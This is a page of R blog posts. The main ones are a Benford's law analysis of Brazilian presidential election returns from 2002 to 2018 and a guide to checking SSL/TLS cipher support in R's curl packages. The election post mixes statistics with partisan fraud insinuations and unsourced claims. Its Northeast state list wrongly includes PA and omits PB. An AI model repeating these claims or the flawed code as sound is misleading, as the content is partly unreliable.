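x <- epub(file, encoding = "UTF-8")  # explicit encoding; "UTF-16" would be the other plausible value
x$data[[1]]                          # parsed text, one row per section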

This change cleared up every issue I was seeing with improper character translation. Even at that point I thought it was just something to do with the fact that EPUB files are all UTF-encoded. I only found out more recently that relying on the native encoding option has been a nightmare for other developers on Windows at a much more fundamental level.

Anyhow, if you were seeing any weird characters after reading in some EPUB files with epubr, hopefully the situation is improved now. I don’t expect epubr to be perfect (there are some strangely put together e-books out there), but so far so good.

Upcoming version

Work is already underway on version 0.6.0. While 0.5.0 is more of an unsung hero, making changes and handling edge cases you are unlikely to notice, 0.6.0 will add some new user functions that enhance the ease with which you can restructure parsed e-book text that comes in looking like crap due to crappy e-book metadata (see the open source packaged EPUB file above as a good example of formatting sadness). The next version will help improve some situations like this in terms of section breaks and content sequence. Garbage in does not need to equal garbage out!


To leave a comment for the author, please follow the link and comment on their blog: Matt’s R Blog.

Benford’s Law for Fraud Detection with an Application to all Brazilian Presidential Elections from 2002 to 2018

Sat, 11/17/2018 - 22:19

(This article was first published on R – insightR, and kindly contributed to R-bloggers)

By Gabriel Vasconcelos and Yuri Fonseca

The intuition

Let us begin with a brief explanation of Benford’s law and why it should work as a fraud detection method. Given a set of numbers, the first thing we need to do is extract the first digit of each number. For example, for (121, 245, 12, 55) the first digits will be (1, 2, 1, 5). Our intuition might say that, for a large set of numbers, each first digit from 1 to 9 would appear in equal proportion, that is, with probability 1/9 for each digit. However, Benford’s law shows us that this is not true. In fact, smaller digits have larger probabilities. If you want to see a very didactic explanation of why this happens, just watch this video https://www.youtube.com/watch?v=XXjlR2OK1kM&t=460s . We could not give a better explanation.

The probability of each first digit can be obtained through the following formula:

P(d) = log10(1 + 1/d), for d = 1, ..., 9,

which will result in the following probabilities:

benford1 = log10(1+1/1:9) names(benford1) = 1:9 barplot(benford1)

benford1 ## 1 2 3 4 5 6 ## 0.30103000 0.17609126 0.12493874 0.09691001 0.07918125 0.06694679 ## 7 8 9 ## 0.05799195 0.05115252 0.04575749

Generalization to more than one digit

Benford’s law can be generalized to more digits. We will show the results for the first two digits together and for the second digit alone. The formula for the first two digits is the same as the formula for the first digit, with d now ranging between 10 and 99.

benford12 = log10(1+1/10:99) names(benford12) = 10:99 barplot(benford12)

Finally, probabilities for the second digit alone can be obtained from the plot above by adding up the probabilities of the two-digit combinations that share the same second digit, from 0 to 9.

library(tidyverse) aux = 10:99 - floor(10:99/10)*10 benford2 = (data.frame(v1 = benford12,v2 = aux) %>% group_by(v2) %>% summarise(v1 = sum(v1)))$v1 names(benford2) = 0:9 barplot(benford2)

When can we use Benford’s law?

Naturally, Benford’s law requires data with a large range, spanning several orders of magnitude. For example, the law will not work for the heights and weights of human beings. However, it is more likely to work for the average heights of all species in the world or for the populations of all countries in the world.
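
A quick illustration of this point (a sketch we added, not from the original post): simulated data spanning several orders of magnitude tracks Benford’s law closely, while a height-like variable does not.

set.seed(1)
first_digit <- function(x) floor(x / 10^floor(log10(x)))  # first significant digit
wide <- rlnorm(1e5, meanlog = 5, sdlog = 3)   # spans many orders of magnitude
narrow <- rnorm(1e5, mean = 170, sd = 10)     # e.g. human heights in cm
round(prop.table(table(first_digit(wide))), 3)    # close to log10(1 + 1/d)
round(prop.table(table(first_digit(narrow))), 3)  # nowhere near Benford's law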

Application: Brazilian Presidential Elections from 2002 to 2018

The Brazilian electoral system has generated a lot of heated discussion in recent years, especially as the 2018 elections approached. Most of the critiques come from the fact that Brazilian elections use an electronic ballot box that does not print the vote. Some people say these electronic devices are safe, and some people say they make the elections opaque and impossible to audit. The latest discussions were mostly focused on the following facts:

  • The Brazilian Congress passed a bill forcing the electronic devices to print the votes. The voter would then verify the information on the paper and put it in a regular ballot box. If the electoral results turned out to be suspicious, the paper votes could be counted to see whether the results match.

  • President Dilma used her veto power on this bill, forcing the elections to stay as they were, without the printed votes.
  • Congress held a new vote that bypassed the president’s veto and reestablished the printed votes.
  • The Supreme Court declared the new bill unconstitutional, and that was the end of the discussion. The elections went ahead with electronic votes only.

Of course, this raised a lot of criticism because there was a lot of pressure coming from the government to stop printed votes. Moreover, the same party had been in government for a fourth consecutive four-year term, and most of the judges in the Supreme Court were appointed by them. We also had public trials in which hackers tried to break into the electronic ballot boxes, and they did so without any problems.

On the other hand, no one knew exactly how a potential fraud could be performed without raising suspicion, so the discussion was very speculative and did not settle anything. An alternative media company called Brasil Paralelo started research on Benford’s law and committed to applying the law to the 2018 elections. Previous tests showed that the 2010 elections were fine and raised some doubts about the 2014 elections. They presented their results in a video and said that they found close to 80% inconsistency in the data in the 2018 first round. They were going to publish a document with more details on the results, but we were not able to find it. Therefore, we will base our opinion solely on the video. The data is published by the government, and they used it at the aggregation level of electoral zones, which is in fact the most adequate aggregation. An electoral zone is like a school, where we have several rooms with ballots where people go to vote. The size of electoral zones varies a lot, from a few hundred voters or fewer to more than 50,000, so the use of Benford’s law seems adequate. However, this study did not answer all our questions (that is our personal opinion), for the following reasons:

  • We have our doubts about how efficiently Benford’s law can detect fraud. In the empirical example we will introduce fraud into the data to show that a substantial change is needed before the fraud becomes visible. Moreover, it is very unlikely that any real data will fit the law perfectly. This has been widely shown: a chi-squared test rejects the hypothesis that the data follow the law even when the figures show a very good fit. Therefore, we can only be suspicious if the data deviate a lot from Benford’s law and, in our opinion, we should also be concerned about changing patterns in the data. For example, the same tests should be performed on many elections to see what changes between them. The data for many elections is easy to download and organize (as we will show in the application), and we could not find comparisons between elections in the Brasil Paralelo application.

  • It is possible to fail to detect fraud if we apply the law to all the data at the same time. Therefore, one should use sub-samples such as regions and states to give more robustness to the results. Brasil Paralelo did that, but in our opinion they went too far. Many of their sub-samples are not big enough: we need large samples to have reasonable convergence to the Benford distribution. What we understood from the video is that they tested more than 100 sub-samples, only for the first digit equal to 1. They based their analysis heavily on state-level sub-samples, and many states may show a bad result just because the sample is very small. These comments take us to the next problem:
  • They did more than 100 tests of Benford’s law and reported them in the video for the first digit equal to 1. They used a confidence band of 3% and rejected all tests that had a proportion of 1s as the first digit outside the interval. The high inconsistency they reported in the end means that many of the sub-samples had proportions outside the intervals. The tricky thing here is that the intervals are the same for all sub-samples, i.e. they did not adjust the intervals for the sample size, which is an obvious thing to do (see the short sketch just after this list). If they had, and had compared with all elections since 2002, they would probably have found that, by their criteria, all elections were inconsistent, which only means that this test is not very good.
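
As a simple illustration of that last point (our own sketch, with hypothetical sub-sample sizes), the width of a 95% interval for the share of leading 1s under Benford’s law depends heavily on n, so a single fixed 3% band cannot be right for both small and large sub-samples:

p1 <- log10(2)                 # Benford probability that the first digit is 1
n <- c(50, 200, 1000, 5000)    # hypothetical sub-sample sizes (numbers of electoral zones)
half_width <- 1.96 * sqrt(p1 * (1 - p1) / n)
data.frame(n, lower = round(p1 - half_width, 3), upper = round(p1 + half_width, 3))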


We would like to apologize to Brasil Paralelo if our comments were unfair. They were based on the video alone and we may have missed something. Their analysis was very good and they were very brave to do it. They deserve our respect.

Disclosure: we are not going to try to fake neutrality. We are all for transparency, and the chain of events that killed the printed vote bill is very strange. However, we will try to make our analysis as unbiased as possible. The most important thing here is that all the results can be reproduced by anyone with a little knowledge of R. We are not audit experts and we can certainly make mistakes.

2002 elections

library(tidyverse)

The first step was to download the data and to create a function that transforms the votes into digit proportions to compare with Benford’s law. We put the download code, the function, and some metadata on Brazilian regions at the end of the post.

We will start the analysis by assuming that the 2002 elections were clean; otherwise we have no baseline against which to compare the other elections. Moreover, the analysis will be on the second round of the elections.

## Prepare the data for the Benford's law ## data2002 = prepare_data(elections2002, round = 2, ncandidates = 2)

Now let us see how the data fits Benford’s law. The bars represent Benford’s law and the lines are the proportions of digits for each candidate. The fit of the data to Benford’s law is very good in the three figures below.

dt = data2002 bar = barplot(benford1, ylim = c(0,0.4), main = "2002 First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford2, ylim = c(0,0.2), main = "2002 Second Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$second$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford12, ylim = c(0,0.06), main = "2002 First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

We could not find anything interesting in the analysis of the second digit alone. Therefore, from here on we will only show the results for the first digit and for the first and second digits together. If you want to see the results for the second digit, you can do it yourself by applying the second-digit code above to other data. Additionally, at the end of the post we show an analysis where we induce some fraud into the data to see how Benford’s law behaves. The code is very simple and you can use it to test several types of fraud.

Looking at the Regions

Brazil has five regions of states; in this part of the post we will look at the two biggest ones (the Southeastern and Northeastern regions). The reason is that the fraud may be small, local, and hard to detect if we look at the entire country. These two regions have enough data to make us comfortable with the sample size. First, let’s prepare the data:

data2002SE = prepare_data(filter(elections2002, SIGLA_UF %in%SE),2,2) data2002NE = prepare_data(filter(elections2002, SIGLA_UF %in%NE),2,2)

The plots are generated with the code below. As you can see, when we move to regions we find some bigger deviations, especially in the SE region. It is very hard to say whether this is a pattern in the data or fraud. The best we could think of is to look at other years and see if the pattern stays the same.

dtlist = list("2002SE"=data2002SE, "2002NE" = data2002NE) lim = 0.4 for(j in 1:2){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

Comparing all elections from 2002 to 2014

Brazil

Preparing the data:

data2002 = prepare_data(elections2002,2,2) data2006 = prepare_data(elections2006,2,2) data2010 = prepare_data(elections2010,2,2) data2014 = prepare_data(elections2014,2,2)

The code below plots Benford’s law and the data for all elections between 2002 and 2014 for the entire country. Although we may see small variations across the years, we don’t think we can say anything about fraud by looking only at these plots. Assuming 2002 was OK, all the figures below can tell us is that 2006, 2010 and 2014 were also OK.

dtlist = list("2002"=data2002,"2006"=data2006,"2010"=data2010,"2014"=data2014) par(mfrow=c(2,2)) lim = 0.4 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

lim = 0.06 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford12, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

Southeastern Region

Preparing the data:

data2002SE = prepare_data(filter(elections2002, SIGLA_UF %in%SE),2,2) data2006SE = prepare_data(filter(elections2006, SIGLA_UF %in%SE),2,2) data2010SE = prepare_data(filter(elections2010, SIGLA_UF %in%SE),2,2) data2014SE = prepare_data(filter(elections2014, SIGLA_UF %in%SE),2,2)

The code below plots Benford’s law and the data for all elections between 2002 and 2014 for the Southeastern region. The conclusions here are the same as for the entire country: if 2002 was fine, then the other years were also fine. Note that the plots show the winner in red and the loser in green. Since Aecio won in the Southeast, the colors are swapped in the 2014 plot. Nevertheless, Dilma’s pattern remains the same as in 2010 and the same as Lula’s pattern in 2002 and 2006. Dilma was Lula’s candidate after his two terms and they are from the same party. The opposition candidate was always from the same party too.

dtlist = list("2002SE"=data2002SE,"2006SE"=data2006SE,"2010SE"=data2010SE,"2014SE"=data2014SE) par(mfrow=c(2,2)) lim = 0.4 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

lim = 0.06 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford12, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

Northeastern Region

Preparing the data:

data2002NE = prepare_data(filter(elections2002, SIGLA_UF %in%NE),2,2) data2006NE = prepare_data(filter(elections2006, SIGLA_UF %in%NE),2,2) data2010NE = prepare_data(filter(elections2010, SIGLA_UF %in%NE),2,2) data2014NE = prepare_data(filter(elections2014, SIGLA_UF %in%NE),2,2)

The code below plots Benford’s law and the data for all elections between 2002 and 2014 for the Northeastern region. Here we start to see some differences in the plots that may raise doubts. In 2002 everything was fine and the data for both candidates fit Benford’s law very well. However, since 2006 we have a clear deviation from the law for the candidate who won the elections. The proportion of ones as the first digit decreases a lot, and the proportions of larger digits are mostly bigger than what Benford’s law would predict. Similar results are found if we look at the first two digits together. This could be due to a change in voting patterns or to fraud. However, if we choose the fraud hypothesis we would have to assume that all elections between 2006 and 2014 were fraudulent. This could be the case, because in 2006 Lula was reelected, meaning that he was already in the government and may have had some influence over the electoral process. Still, we don’t think Benford’s law is useful for detecting fraud on its own. It can only be useful to support other evidence and perhaps give a stronger confirmation. Results like these could be used as a starting point for further investigation of the elections. However, auditing electronic ballot boxes is not easy.

dtlist = list("2002NE"=data2002NE,"2006NE"=data2006NE,"2010NE"=data2010NE,"2014NE"=data2014NE) par(mfrow=c(2,2)) lim = 0.4 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford1, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

lim = 0.06 for(j in 1:4){ dt = dtlist[[j]] bar = barplot(benford12, ylim = c(0,lim), main = names(dtlist)[j]) for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") }

2018 elections

The 2018 elections were very different. First, the use of social media was very important, and second, the opposition candidate in the second round was from a whole new party. The Workers’ Party still managed to put a candidate (Fernando Haddad) in the second round. Moreover, Dilma was impeached in 2016 and the vice president, Temer, took over. Recall that the 2018 election data must be downloaded directly from the government page. At the end of the post we give the details on how to download the data and put it in the same format as the 2002-2014 data so that the same code works.

First, let us look at the entire country. The results are generated by the code below, and the figure is just below the code. Once again, everything looks fine when we look at the entire country: the data fit Benford’s law very well.

# prepare the data # data2018 = prepare_data(elections2018,2,2) dt = data2018 par(mfrow = c(2,2)) bar = barplot(benford1, ylim = c(0,0.4), main = "2018 First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") bar = barplot(benford12, ylim = c(0,0.06), main = "2018 First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Southeast Region

Now let’s move to the Southeastern region. Here we have something very unusual. The curves for both candidates deviate significantly from Benford’s law when we compare this region with previous elections. The curve for Fernando Haddad overestimates the smaller digits and underestimates the bigger digits, and the curve for Jair Bolsonaro shows the opposite situation. Although the fit for the SE region was not perfect in previous elections, it followed a consistent pattern that was broken in 2018.

# prepare the data # data2018SE = prepare_data(filter(elections2018,SIGLA_UF%in%SE),2,2) dt = data2018SE par(mfrow = c(2,2)) bar = barplot(benford1, ylim = c(0,0.4), main = "2018SE First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") bar = barplot(benford12, ylim = c(0,0.06), main = "2018SE First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Northeast Region

Next, the NE region. There is nothing new here. The Workers’ Party candidate shows the same pattern as in the 2006-2014 period and the other candidate looks fine. Therefore, to say that the 2018 elections were fraudulent in the NE region we must also say that all elections from 2006 to 2014 were fraudulent.

# prepare the data # data2018NE = prepare_data(filter(elections2018,SIGLA_UF%in%NE),2,2) dt = data2018NE par(mfrow = c(2,2)) bar = barplot(benford1, ylim = c(0,0.4), main = "2018NE First Digit") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n") bar = barplot(benford12, ylim = c(0,0.06), main = "2018NE First and Second Digits") for(i in 1:length(dt)){ lines(bar,dt[[i]]$fands$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

A brief look at the first round

Finally, let’s have a look at the first round of the 2018 elections in the NE and SE regions to see if there is anything new. The first plot is for the SE region. It also shows the votes for the third-place candidate. The pattern is the same as in the second round. However, since Fernando Haddad and Ciro Gomes had similar results, if the elections were fraudulent it was probably to influence the results of Jair Bolsonaro. It is impossible to know whether the fraud would have been to increase or decrease his number of votes. However, most critiques of the electronic system came from him and his supporters, and he is also the author of the printed vote bill.

data2018SEfr = prepare_data(filter(elections2018,SIGLA_UF%in%SE),1,3) dt = data2018SEfr bar = barplot(benford1, ylim = c(0,0.4), main = "2018SE First Digit, First Round") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Finally, the NE region. We don’t know if we can get any new information from this. The Workers’ Party candidate shows the same odd pattern as in previous elections and in the second round of the 2018 elections. However, in the second round the proportion of first digits equal to one was closer to 0.2, and here it is closer to the Benford value of 0.3. Bolsonaro had results similar to the second round, with a little more variation in the smaller digits. We will not risk saying anything about the other candidate because we have nothing to compare him with.

data2018NEfr = prepare_data(filter(elections2018,SIGLA_UF%in%NE),1,3) dt = data2018NEfr bar = barplot(benford1, ylim = c(0,0.4), main = "2018NE First Digit, First Round") for(i in 1:length(dt)){ lines(bar,dt[[i]]$first$prop,type ="b", col = i+1) } legend("topright", legend = names(dt), col = c(2:(length(dt)+1)), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Conclusion

We think the main conclusion here is that Benford’s law alone does not prove anything. It still needs the narrative and other evidence. In our opinion, the lack of transparency in the electronic system is a bigger problem than what the data says through Benford’s law. If the elections were more transparent, any suspicious results one might find could be investigated further. However, we don’t think that is the case.

Downloading the data

The data from 2002 to 2014 can be downloaded with the electionsBR package. The 2018 data must be downloaded manually.

######## Download Data from TSE ########## library(electionsBR) elections2010 = electionsBR::vote_mun_zone_fed(2010) elections2014 = electionsBR::vote_mun_zone_fed(2014) elections2002 = electionsBR::vote_mun_zone_fed(2002) elections2006 = electionsBR::vote_mun_zone_fed(2006)

After you download all the data, save the tables in a .csv or a .rda to avoid downloading it again. The 2018 data can be downloaded from:

http://agencia.tse.jus.br/estatistica/sead/odsele/votacao_candidato_munzona/votacao_candidato_munzona_2018.zip

The presidential data must be arranged to be in the same format as the other years:

library(tidyverse) elections2018 = read.csv("votacao_candidato_munzona_2018_BR.csv",sep =";",header = TRUE,fileEncoding = "latin1") ## select only the variables we used ## elections2018 = elections2018 %>% select(DS_CARGO,SG_UF,QT_VOTOS_NOMINAIS,NM_MUNICIPIO,NR_ZONA,NM_URNA_CANDIDATO,NR_TURNO) %>% filter(QT_VOTOS_NOMINAIS>0) ## unify variable names colnames(elections2018) = c("DESCRICAO_CARGO","SIGLA_UF","TOTAL_VOTOS","NOME_MUNICIPIO","NUMERO_ZONA","NOME_URNA_CANDIDATO","NUM_TURNO") elections2018$DESCRICAO_CARGO = toupper(elections2018$DESCRICAO_CARGO)

Function to arrange data and other metadata

The code below shows the function we used to arrange the data. It filters for president, the desired round, and the number of candidates. If you choose 3 candidates it will select the three most voted. Note that if you choose round = 2 the number of candidates must be 1 or 2. The function also extracts the first and second digits for each zone and calculates the proportion of each digit. It returns a list where each element is named after a candidate, and each candidate has three data.frames: one for the first digit, one for the second digit, and one for the first and second digits together.

### States in each Brazilian region SE = c("SP","MG","ES","RJ") NE = c("BA","PE","CE","MA","AL","RN","PA","PI","SE") S = c("PR", "RS", "SC") CO = c("GO","DF","MT","MS") N = c("AM", "RR", "AP", "PA","TO","RO","AC") regions = list(SE=SE,NE=NE,S=S,CO=CO,N=N) prepare_data = function(data, round=1, ncandidates=2) { ## select only second round president and create one table for each candidate ## president = data %>%filter(NUM_TURNO == round, DESCRICAO_CARGO == "PRESIDENTE") candidates = president %>% group_by(NOME_URNA_CANDIDATO)%>% summarise(votes = sum(TOTAL_VOTOS)) %>% arrange(desc(votes)) candidates_data = list() for(i in 1:ncandidates){ candidates_data[[i]] = president %>% filter(NOME_URNA_CANDIDATO == candidates$NOME_URNA_CANDIDATO[i]) } names(candidates_data) = candidates$NOME_URNA_CANDIDATO[1:ncandidates] for(i in 1:ncandidates){ aux = candidates_data[[i]] rem = ifelse(aux$TOTAL_VOTOS>=10,1,NA) candidates_data[[i]]$fd = as.numeric(str_sub(aux$TOTAL_VOTOS,1,1)) candidates_data[[i]]$sd = as.numeric(str_sub(aux$TOTAL_VOTOS,2,2))*rem candidates_data[[i]]$f2d = as.numeric(str_sub(aux$TOTAL_VOTOS,1,2))*rem } output = list() for(i in 1:length(candidates_data)){ aux = candidates_data[[i]] d1 = aux%>% group_by(fd) %>% count() d2 = (aux%>% group_by(sd) %>% count())[1:10,] d12 = (aux%>% group_by(f2d) %>% count())[1:90,] n1 = nrow(aux) n2 = n12 = nrow(filter(aux,!is.na(sd))) df1 = data.frame(1:9,d1[,2]/n1,n1) df2 = data.frame(0:9,d2[,2]/n2,n2) df12 = data.frame(10:99,d12[,2]/n12,n12) colnames(df1) = colnames(df2) = colnames(df12) = c("digit", "prop", "n") dflist = list(first = df1, second = df2, fands = df12) output[[i]] = dflist } names(output) = names(candidates_data) return(output) } Code to induce fraud

Here we will induce fraud in the 2002 data by adding 1000 votes to every electoral zone, to see whether Benford’s law can capture it. We know this is not a realistic fraud, because some electoral zones are very small, but the test is just to see how the fraudulent data fits Benford’s law. Feel free to try different types of fraud.

## create fraudulent data ## elections2002fake = elections2002 %>% mutate(TOTAL_VOTOS = TOTAL_VOTOS+1000) ## Prepare the real data and the fraudulent data for the Benford's law ## data2002 = prepare_data(elections2002, round = 2, ncandidates = 2) data2002fake = prepare_data(elections2002fake, round = 2, ncandidates = 2)

Now let us have a look at what happens in the fraudulent data compared to the real data, just for the first candidate (Lula) to save some space. Feel free to look at the second candidate by changing [[1]] to [[2]]. The three figures below show that the fraudulent data deviates a lot from Benford’s law. However, if you try very small changes in the data, the deviation will be harder to identify.

bar = barplot(benford1, ylim = c(0,0.4), main = "2002 First Digit with Fraud") lines(bar,data2002[[1]]$first$prop,type ="b", col = 2) lines(bar,data2002fake[[1]]$first$prop,type ="b", col = 4) legend("topright", legend = c("Real Data","Fraudulent Data"), col = c(2,4), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford2, ylim = c(0,0.2), main = "2002 Second Digit with Fraud") lines(bar,data2002[[1]]$second$prop,type ="b", col = 2) lines(bar,data2002fake[[1]]$second$prop,type ="b", col = 4) legend("topright", legend = c("Real Data","Fraudulent Data"), col = c(2,4), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

bar = barplot(benford12, ylim = c(0,0.06), main = "2002 First and Second Digits with Fraud") lines(bar,data2002[[1]]$fands$prop,type ="b", col = 2) lines(bar,data2002fake[[1]]$fands$prop,type ="b", col = 4) legend("topright", legend = c("Real Data","Fraudulent Data"), col = c(2,4), cex = 0.6, seg.len = 0.4 ,lty = 1,bty = "n")

Now we are going to show the justification for not using the chi-squared test throughout the post. The test statistic is defined as follows:

chi2 = n * sum_d ( (phat_d - p_d)^2 / p_d ), d = 1, ..., 9,

where phat_d is the estimated proportion of digit d in the data, p_d is the proportion of digit d given by Benford’s law, and n is the number of observations. The statistic follows a chi-squared distribution with 8 degrees of freedom. We calculated the p-values for this test below to show that it rejects both the real data and the fraudulent data.

chireal = data2002[[1]]$first$n[1]*sum(((data2002[[1]]$first$prop - benford1)^2)/(benford1)) chifraud = data2002fake[[1]]$first$n[1]*sum(((data2002fake[[1]]$first$prop - benford1)^2)/(benford1)) 1-pchisq(chireal,8) ## [1] 1.215743e-10 1-pchisq(chifraud,8) ## [1] 0

To leave a comment for the author, please follow the link and comment on their blog: R – insightR.

Tis the Season to Check your SSL/TLS Cipher List Thrice (RCurl/curl/openssl)

Sat, 11/17/2018 - 18:00

(This article was first published on R – rud.is, and kindly contributed to R-bloggers)

The libcurl library (the foundational library behind the RCurl and curl packages) has used OpenSSL’s default ciphers since version 7.56.0 (October 4, 2017). If you’re a regular updater of curl/httr you should be fairly current with these cipher suites, but if you’re not a keen updater, or you use RCurl for your web-content tasks, you are likely not working with a recent cipher list and may start running into trouble as the internet’s self-proclaimed web guardians continue their wild-abandon push towards “HTTPS Everywhere”.

Why is this important? Well, as a web consumer (via browsers) you likely haven’t run into any issues when visiting SSL/TLS-enabled sites since most browsers update super-frequently and bring along modern additions to cipher suites with them. Cipher suites are one of the backbones of assurance when it comes to secure connections to servers and stronger/different ciphers are continually added to openssl (and other libraries). If a server (rightfully) only supports a modern, seriously secure TLS configuration, clients that do not have such support won’t be able to connect and you’ll see errors such as:

SSL routines:SSL23_GET_SERVER_HELLO:sslv3 alert handshake failure

You can test what a server supports via tools like SSL Test. I’d point to a command-line tool, but there are enough R users on crippled Windows systems that it’s just easier to have you point and click to see. If you are game to try a command-line tool then give testssl a go from an RStudio terminal (I use that suggestion specifically to be platform agnostic, as I cannot assume R Windows users know how to use a sane shell). The testssl script has virtually no dependencies so it should “work everywhere”. Note that both SSL Test and testssl make quite a few connections to a site, so make sure you’re only using your own server(s) as test targets unless you have permission from others to use theirs (go ahead and hit mine if you like).

You can also see what your R client packages support. One could run:

library(magrittr) read.table( text = system("openssl ciphers -v", intern=TRUE) %>% gsub("[[:alpha:]]+=", "", .) ) %>% setNames( c("ciphername", "protoccol_version", "key_exchange", "authentication", "symmetric_encryption_method", "message_authentication_code") )

in an attempt to do that via the openssl binary on your system, but Windows users likely won’t be able to run that (unlike every other modern OS, including iOS), and it might not show you what your installed R client packages can handle, since they may be using different libraries.
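
A quick local check that does reflect what the curl package itself is linked against (assuming you have the curl package installed) is to ask it directly:

## Which libcurl version and TLS backend is the R curl package built against?
curl::curl_version()[c("version", "ssl_version")]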

So, another platform-agnostic option (but one requiring a call to a web site, so some privacy leakage) is to use How’s My SSL.

ssl_check_url <- "https://www.howsmyssl.com/a/check" jsonlite::fromJSON( readLines(url(ssl_check_url), warn = FALSE) ) -> base_chk jsonlite::fromJSON( RCurl::getURL(ssl_check_url) ) -> rcurl_chk jsonlite::fromJSON( rawToChar( curl::curl_fetch_memory(ssl_check_url)$content ) ) -> curl_chk

Compare the $given_cipher_suites for each of those to see how they compare, and also take a look at $rating. macOS and Linux users should have fairly uniform results for all three. Windows users may be in for a sad awakening (I mean, you’re used to that on a regular basis, so it’s cool). You can also configure how you communicate what you support via the ssl_cipher_list cURL option (capitalization is a bit different with RCurl, but I kinda want you to use the curl package so you’re on your own to translate). Note that you can’t game the system and claim you can handle a cipher you don’t actually have.
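
As a hedged sketch of that last option, you can pass ssl_cipher_list through a curl handle; the cipher string below is only an example and must name ciphers your local TLS library actually supports:

## Advertise a restricted cipher list for a single request (illustrative cipher name)
h <- curl::new_handle(ssl_cipher_list = "ECDHE-RSA-AES256-GCM-SHA384")
res <- curl::curl_fetch_memory("https://www.howsmyssl.com/a/check", handle = h)
jsonlite::fromJSON(rawToChar(res$content))$rating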

FIN

You should try to stay current with the OpenSSL (or equivalent) library on your operating system and also with the libcurl library on your system and then the curl, openssl, and RCurl packages. You may have production-rules requiring lead-times for changing configs but these should be in the “test when they make it to CRAN and install as-soon-as-possible-thereafter” category.


To leave a comment for the author, please follow the link and comment on their blog: R – rud.is.

Congress Over Time

Sat, 11/17/2018 - 14:25

(This article was first published on R on kieranhealy.org, and kindly contributed to R-bloggers)

Since the U.S. midterm elections I’ve been playing around with some Congressional Quarterly data about the composition of the House and Senate since 1945. Unfortunately I’m not allowed to share the data, but here are two or three things I had to do with it that you might find useful.

The data comes as a set of CSV files, one for each congressional session. You download the data by repeatedly querying CQ’s main database by year. In its initial form, the top of each file looks like this:

